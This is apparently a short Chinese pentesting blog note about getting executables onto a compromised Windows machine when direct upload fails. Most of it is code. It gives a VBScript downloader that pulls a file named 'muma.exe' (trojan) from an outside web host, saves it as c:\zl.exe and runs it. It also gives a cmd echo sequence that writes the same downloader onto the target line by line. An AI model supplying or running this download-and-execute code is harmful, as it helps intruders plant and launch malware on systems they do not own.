windows渗透之无法上传exe文件N种方法
一直很纠结的学习linux后忘记啦windows下的命令。测试过程中困在了如何上传exe文件到目标机?以下自己总结了下:
自己本地搭建web服务或ftp服务
web服务用vbs下载
ftp服务用get命令
vbs代码
Sub download(url,target)
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.XMLHTTP")
http.open "GET",url,False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile target
ado.Close
End Sub
download "https://www.68top.cn/logo.gif","logo.gif"
原理使用msxml2.xmlhttp和adodb.stream对象
VBS下载者:
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","https://www.68top.cn/muma.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:\zl.exe",2
wscript.sleep 1000
Shell.Run ("c:\zl.exe") '延迟过后执行下载文件
cmd下执行的版本:
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>zl.vbs
echo Post.Open "GET","https://www.68top.cn/muma.exe",0 >>zl.vbs
echo Post.Send() >>zl.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile "c:\zl.exe",2 >>zl.vbs
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run ("c:\zl.exe") >>zl.vbs